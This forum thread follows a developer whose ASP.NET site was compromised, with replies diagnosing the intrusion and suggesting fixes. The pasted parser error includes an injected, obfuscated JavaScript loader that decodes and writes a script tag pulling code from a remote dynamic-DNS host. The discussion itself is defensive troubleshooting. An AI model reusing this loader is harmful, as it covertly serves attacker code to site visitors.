Parser Error Message: Possibly being Hacked

[txmed]

Greetings,

I've recently created a ASP 2.0 site that's been running fine. A few days ago I noticed that the page was coming up with a "Parser" error message. I'm hoping someone has experience in this error message and can inform me how to fix it.

I'm using a standard master page for my entire site. I then have all of the HTML "child" pages showing in the <asp:Content> tags. The problem is that I think I'm being hacked and someone is inserting Javascript code after the </asp:Content> tag.

Here is a copy of the error message:

Parser Error

Description: An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately.

Parser Error Message: Only Content controls are allowed directly in a content page that contains Content controls.

Source Error:

Line 34: </asp:Content>
Line 35: 
Line 36: <html><body><script type="text/javascript">var gLgqfal0LD6Zjb = "r0wbP21r0wbP35";var LGVypdcQDOHuoS0 = "r0wbP3cr0wbP73r0wbP63r0wbP72r0wbP6"; var LGVypdcQDOHuoS1 = "9r0wbP70r0wbP74r0wbP20r0wbP74r0wbP"; var LGVypdcQDOHuoS2 = "79r0wbP70r0wbP65r0wbP3dr0wbP22r0wb"; var LGVypdcQDOHuoS3 = "P74r0wbP65r0wbP78r0wbP74r0wbP2fr0w"; var LGVypdcQDOHuoS4 = "bP6ar0wbP61r0wbP76r0wbP61r0wbP73r0"; var LGVypdcQDOHuoS5 = "wbP63r0wbP72r0wbP69r0wbP70r0wbP74r"; var LGVypdcQDOHuoS6 = "0wbP22r0wbP20r0wbP73r0wbP72r0wbP63"; var LGVypdcQDOHuoS7 = "r0wbP3dr0wbP22r0wbP68r0wbP74r0wbP7"; var LGVypdcQDOHuoS8 = "4r0wbP70r0wbP3ar0wbP2fr0wbP2fr0wbP"; var LGVypdcQDOHuoS9 = "33r0wbP34r0wbP36r0wbP33r0wbP32r0wb"; var LGVypdcQDOHuoS10 = "P66r0wbP66r0wbP76r0wbP78r0wbP7ar0w"; var LGVypdcQDOHuoS11 = "bP2er0wbP73r0wbP65r0wbP72r0wbP76r0"; var LGVypdcQDOHuoS12 = "wbP65r0wbP69r0wbP72r0wbP63r0wbP2er"; var LGVypdcQDOHuoS13 = "0wbP63r0wbP6fr0wbP6dr0wbP2fr0wbP2f"; var LGVypdcQDOHuoS14 = "r0wbP6dr0wbP6cr0wbP2er0wbP70r0wbP6"; var LGVypdcQDOHuoS15 = "8r0wbP70r0wbP22r0wbP3er0wbP20r0wbP"; var LGVypdcQDOHuoS16 = "3cr0wbP2fr0wbP73r0wbP63r0wbP72r0wb"; var LGVypdcQDOHuoS17 = "P69r0wbP70r0wbP74r0wbP3e"; var W9QVkc1kFlgLAO = "zcViA21r0wbP35";var iFcV0Loi2K5lA3 = LGVypdcQDOHuoS0+LGVypdcQDOHuoS1+LGVypdcQDOHuoS2+LGVypdcQDOHuoS3+LGVypdcQDOHuoS4+LGVypdcQDOHuoS5+LGVypdcQDOHuoS6+LGVypdcQDOHuoS7+LGVypdcQDOHuoS8+LGVypdcQDOHuoS9+LGVypdcQDOHuoS10+LGVypdcQDOHuoS11+LGVypdcQDOHuoS12+LGVypdcQDOHuoS13+LGVypdcQDOHuoS14+LGVypdcQDOHuoS15+LGVypdcQDOHuoS16+LGVypdcQDOHuoS17; QY2NpXLfBx6PMN = iFcV0Loi2K5lA3.replace(/r0wbP/g,"%");var fBqXRS4aosIqDN = unescape;var gLgqfal0LD6Zjb = "YV1vq21zcViA35";w9221 = this;var eNQGwSdlzzQBxW=w9221["WJd5GoGJc2uG5mJGe2JnltJ".replace(/[J52WlG\:]/g, "")];eNQGwSdlzzQBxW.write(fBqXRS4aosIqDN(QY2NpXLfBx6PMN));</script></body></html>

Again I'm stressing that I did not write the code that appears after the </asp:Content> tag. Someone (or something) is adding it there.


Unfortunately the only thing I can do right now is copy my original source files over the corrupted file. But when I do it's only a matter of time before the problem happens again.

I've done some research on the web but I cannot find a solution. Can some please help me?

Thanks,

(txmed)

 

[jmeckley]

webforms is known for it's horrendous html/style/javascript output. but in this instance I think you may be correct, in that someone is attempting to hack your site. the additional html and body tags are a sign that it's not produced by the webforms view engine.

the immediate fix is to overwrite the corrupted files.
if your application uses a database verify the data is clean too.
finally change your password for site administration. there's a chance your admin account was compromised.

Jason Meckley
Programmer

faq855-7190
faq732-7259

 

[ca8msm]

Yes, it certainly looks like your site has been hacked (I'd say the most likely cause is sql injection). Have a look at

http://support.microsoft.com/kb/954476

to see if that helps you identify the problem.

Mark,

Darlington Web Design[tab]|[tab]Experts, Information, Ideas & Knowledge[tab]|[tab]ASP.NET Tips & Tricks

 

[ca8msm]

Forgot to say, it could also be an XSS attack, so have a look at

http://www.microsoft.com/downloads/...48-bdb9-45b3-a1b7-44ccdcb7cfbe&displaylang=en

Mark,

Darlington Web Design[tab]|[tab]Experts, Information, Ideas & Knowledge[tab]|[tab]ASP.NET Tips & Tricks

 

[txmed]

jmeckley & ca8msm,

Thank you for your quick response. I'm going to change the login credentials for my site to see if this fixes the problem. I'll keep you posted if this happens again.

(txmed)

 

[ca8msm]

I'm going to change the login credentials for my site to see if this fixes the problem

The problem is that will only mask the problem; whatever method they used to get in will still be vunerable so even if you change your password the same method can be applied and you will be back in the same position.

I'm not saying don't do it, you should of course change it to something secure, but I see little point in changing it and then doing nothing.

Mark,

Darlington Web Design[tab]|[tab]Experts, Information, Ideas & Knowledge[tab]|[tab]ASP.NET Tips & Tricks

 

[jmeckley]

if the content is injected into the html rendered by webforms then you have an injection attack. if the html is present in the aspx markup, then your credentials were compromised. most likely the ftp credentials.

Jason Meckley
Programmer

faq855-7190
faq732-7259

 

[txmed]

jmeckley,

Yes I had that same thought. The fact that the code was appearing within my .aspx file made me believe that my credentials were compromised.

I just changed my login credentials and I verified that the site is coming up as intended. I'm going to wait to see if this fixes the problem.

Thanks for your input.

(txmed)

 

[ca8msm]

The fact that the code was appearing within my .aspx file made me believe that my credentials were compromised.

Which could be as a result of injection (i.e. reading credentials stored in a database), so you still need to shore up whatever original method they used to get into your site.

Mark,

Darlington Web Design[tab]|[tab]Experts, Information, Ideas & Knowledge[tab]|[tab]ASP.NET Tips & Tricks

 

[txmed]

I agree but no where in my app am I using the login credentials for the site. Unless the database of the company where I'm hosting the site has been hacked into.

(txmed)

 

[ca8msm]

Unless the database of the company where I'm hosting the site has been hacked into.

It's certainly possible. Whether they would admit this to you is unlikely but it may be worth asking if they have had any other reports of this.

Mark,

Darlington Web Design[tab]|[tab]Experts, Information, Ideas & Knowledge[tab]|[tab]ASP.NET Tips & Tricks

 

[NESWalt]

In a production environment, our FTP root is NOT part of the HTTP root... that is I can ftp the files up, but I have to have some other process copy/move the files to the HTTP root. Essentially we have a web service that requires credentials (different from FTP) that hashes against what's supposed to be there, and then copies the files if it's proper.

 

[txmed]

ca8msm,

Yes I agree. I'll call them to see what they say.


NESWalt,

Thank you for your input. I'll see what we can do in the future.

Thanks,

(txmed)

 

[jmeckley]

how strong was your password? if the password was weak, then a simple dictionary attack could give someone access to your account.

Jason Meckley
Programmer

faq855-7190
faq732-7259

 

[txmed]

jmeckley,

The password was fairly strong but I broke a cardinal rule and used a user name/password that I've used for other accounts. I went ahead and changed the password to something stronger and more difficult to guess.

(txmed)

 

[txmed]

Hello. I just wanted to send an update to everyone who helped me out on this topic. I changed the password for my login credentials and I have not had this problem since.

Thanks to everyone who helped me with this.

(txmed)